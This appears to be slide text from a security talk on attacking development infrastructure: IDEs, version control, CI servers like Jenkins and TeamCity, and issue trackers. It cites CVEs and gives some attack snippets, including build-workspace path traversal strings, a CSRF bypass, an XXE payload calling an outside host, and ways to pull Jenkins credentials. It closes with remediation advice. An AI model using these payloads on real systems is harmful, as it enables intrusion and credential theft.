The talk will be about modern development infrastructure from an attacker's perspective. As all we know, developers is rulers of the software world. Therefore, the one who can gain control of development infrastructure can control software thus can control its users.
In the talk, we’ll cover a number of attack scenarios on the infrastructure (including repos, CI tools, bug trackers etc.) using simple (or sometimes not so simple) security bugs. Also, we'll list the most valuable targets inside development environment.
5. An integrated development environment (IDE) is a software application that
provides comprehensive facilities to computer programmers for software
development. An IDE normally consists of a source code editor, build
automation tools and a debugger. Most modern IDEs have intelligent code
completion. (с) Wikipedia
● Consumes user input
● Produces sources
● Builds sources
● Uses plugins for integration with other tools
● Has UI
Components: IDE
6. An integrated development environment (IDE) is a software application that
provides comprehensive facilities to computer programmers for software
development. An IDE normally consists of a source code editor, build
automation tools and a debugger. Most modern IDEs have intelligent code
completion. (с) Wikipedia
● Consumes user input
● Produces sources
● Builds sources
● Uses plugins for integration with other tools
● Has UI
● (Even the IDE!) Can be the target of an attack
Components: IDE
7. Components: IDE
An integrated development environment (IDE) is a software application that
provides comprehensive facilities to computer programmers for software
development. An IDE normally consists of a source code editor, build
automation tools and a debugger. Most modern IDEs have intelligent code
completion. (с) Wikipedia
● Consumes user input
● Produces sources
● Builds sources
● Uses plugins for integration with other tools
● Has UI
● Can be target of an attack
Jetbrains Intellij based IDEs prone to CSRF vulnerability which allows
attacker to access local file system from a malicious website
JetBrain’s advisory: https://blog.jetbrains.com/blog/2016/05/11/security-
update-for-intellij-based-ides-v2016-1-and-older-versions/
Example
8. A component of software configuration management, version control, also
known as revision control or source control, is the management of changes to
documents, computer programs, large web sites, and other collections of
information
● Stores source code + additional info (not always trusted)
● Uses plugins for integration with other tools
● Has UI
Components: Version control
9. A component of software configuration management, version control, also
known as revision control or source control, is the management of changes to
documents, computer programs, large web sites, and other collections of
information
● Stores source code + additional info (not always trusted)
● Uses plugins for integration with other tools
● Has UI
● Will be the target of attack
Components: Version control
10. Components: Version control
A component of software configuration management, version control, also
known as revision control or source control, is the management of changes to
documents, computer programs, large web sites, and other collections of
information
● Stores user supplied data (not always trusted)
● Uses plugins for integration with other tools
● Has UI
● Will be the target of attack
A number of CVEs and other vulns in:
● GIT itself
● GIT-based repositories (Gitlub, GitHub etc)
The same thing for less popular Mercurial and SVN
Example
11. Continuous integration (CI) is the practice, in software engineering, of merging
all developer working copies to a shared mainline several times a day
● Stores user supplied data (not always trusted)
● Executes (!) user supplied data
● Stores credentials and other identity data
● Has UI
Components: CI system
12. Continuous integration (CI) is the practice, in software engineering, of merging
all developer working copies to a shared mainline several times a day
● Stores user supplied data (not always trusted)
● Executes (!) user supplied data
● Stores credentials and other identity data
● Has UI
● The most expected to be the target of attack
Components: CI system
13. An issue tracking system (also ITS, trouble ticket system, support ticket,
request management or incident ticket system) is a computer software
package that manages and maintains lists of issues, as needed by an
organization.
● Stores user supplied data (not always trusted)
● Has UI
Components: Issue trackers
14. An issue tracking system (also ITS, trouble ticket system, support ticket,
request management or incident ticket system) is a computer software
package that manages and maintains lists of issues, as needed by an
organization.
● Stores user supplied data (not always trusted)
● Has UI
● Probably will be the target of attack
Components: Issue trackers
15. Components: Issue trackers
An issue tracking system (also ITS, trouble ticket system, support ticket,
request management or incident ticket system) is a computer software
package that manages and maintains lists of issues, as needed by an
organization.
● Stores user supplied data (not always trusted)
● Has UI
● Probably will be the target of attack
A number of CVEs and other vulns in various issue tracking systems
● Latest XXE vulnerability in JetBrains YouTrack as an example of
common WEB bug.
http://blog.jetbrains.com/youtrack/2016/02/important-youtrack-6-5-
17031-update/
● Much more funny example cve-2015-4499 in Bugzilla which allows
escalation of privileges via improper validation of emails
https://blog.perimeterx.com/bugzilla-cve-2015-4499/
Example
16. 1. Directly affects Source codes of your product
2. Works with developer's identity
3. Can provide a great help for attacker during network
infiltration
Why so valuable?
17. 1. The source code itself
Can be stolen
2. Your application’s end users
Can be infected
Goodies: Source code
18. ● Your private (signing) key
Signing malicious code with your keys
● Evading Antiviruses
● Circumventing several security mechanisms on some OS (like
iOS)
Goodies: Developer’s identity
19. ● Elevation of privilege
○ Domain credentials
○ Service credentials
○ SSH keys
...
● Malicious code execution -> full access to your network
Goodies: Network infiltration
20. Based on the previous slides, we have the following types of
goodies:
● Source code
● Developers identity
● Network-used credentials
● Code execution (e.g. backend access)
Goodies: Summary
21. Attack surface? Where to look
+ + + -
+ + - -
+ + +++ +
- - + -
Actually, not in scope =)
The information below based on my own experience with dev tools and
may or may not represent your own knowledge.
Also, the distribution of goodies between components based on my
understanding of how each component should work
Disclaimer
24. User Interface
● Graphical (mostly web-based) interface to control Master
● (sometimes) API’s and other such stuff
Actually, each component has it
Attack surface?
The keys to pwn the components
25. Plugins
● Various tools to modify base system
Such as:
○ Security plugins
○ Integration plugins
○ Reporting plugins
○ ….
With all this integration stuff, it is very likely, that a component has the
ability to use plugins
Attack surface?
The keys to pwn the components
31. ● Vulnerable instances (often with public exploits)
● Default credentials (or their absence)
● Building tools runs under high privileged accounts (root or
system)
● No (or bad) role management
● No sandboxing (isolation)
*based on observation from various pentests
Common configuration problems*
32. ● No isolation on build servers
○ It is possible to access sources of other projects
Just pass something like this to your build script:
../workspace/ - Jenkins Agent’s working dir
../../work/ (buildAgent/work/) - Teamcity Agent’s working dir
A Note on isolation of builds
../workspace/
../../work/ (buildAgent/work/)
33. ● No isolation on build servers
○ It is possible to access sources of other projects
○ In case of Master, possibility to access server
configuration itself
Just pass something like this to your build script:
../workspace/ - Jenkins Agent’s working dir
../../work/ (buildAgent/work/) - Teamcity configuration dir
A Note on isolation of builds
$JENKINS_HOME/
.BuildServer/config/
34. Jenkins. A number of XSS vectors misusing Jenkins functionality
- Custom web server for user supplied data
- HTML content from code repos
Exploit: link
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
/UserContent/
/job/<ProjectName>/ws/
35. Jenkins universal CSRF
CVE-2015-7538
Exploit: Change Content-Type for any request to multipart/form-data
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
if (valid || isMultipart(httpRequest)) {
chain.doFilter(request, response);
} else {
LOGGER.log(Level.WARNING, "No valid crumb was
included in request for {0}. Returning {1}.", new
Object[] {httpRequest.getRequestURI(),
HttpServletResponse.SC_FORBIDDEN});
36. Notorious Java deserialization in Jenkins CLI (command line
interface) deserialization vulnerability
CVE-2015-8103
Affected library: ./webapps/ROOT/WEB-INF/lib/commons-collections-3.2.1.
jar
Details and Exploit: What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your
Application Have in Common? This Vulnerability by foxglove security
Payload generator: https://github.com/frohoff/ysoserial
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
37. Notorious Java deserialization in Jenkins Xstream parsing
CVE-2016-0792
Details and Exploit: Serialization Must Die: Act 2: XStream (Jenkins CVE-2016-0792)
by contrast security
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
38. TeamCity privilege escalation through IDOR.
CVE-2015-1313
- is accessible even if registration is turned of in
configs
Details and exploit at: https://beyondbinary.io/articles/teamcity-account-creation/
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
/registerUserSubmit.html
39. YouTrack XXE in user import function
Details: bo0om’s blog + hackerone report 114476 (sadly, both in Russian)
Exploit: Send XML payload via PUT method to URI /rest/import/users?{test}
Example payload:
Bugs Bug͡ s B͜ ̢͝͝ u͢ ̸̕g͢ ̢͝ ̛̀s̨͘͘͟!!!
<?xml version="1.0"?>
<!DOCTYPE list [
<!ENTITY % xxe SYSTEM "http://myserver/xxe-test">
%xxe;
]>
<list></list>
45. ● Network Infiltration
○ Gaining credentials
E.g. from local encrypted storage
For Jenkins: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html -
Retrieving the eccryption key via admin script console
○ Gaining backend access
Exploitation
47. ● Network Infiltration
○ Gaining credentials
E.g. from local encrypted storage
For Jenkins: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html -
Retrieving the ecryption key via admin script console
○ Gaining backend access
Exploitation
55. Remediations. Summary
● Never rely on default settings
● Never bind to 0.0.0.0
● Never rely on safety of 3rd party components like plugins
● Update your tools as soon as a new security advisory is
published
● Perform additional validation on all user inputs (including
sources)
● Try to isolate projects (Docker?)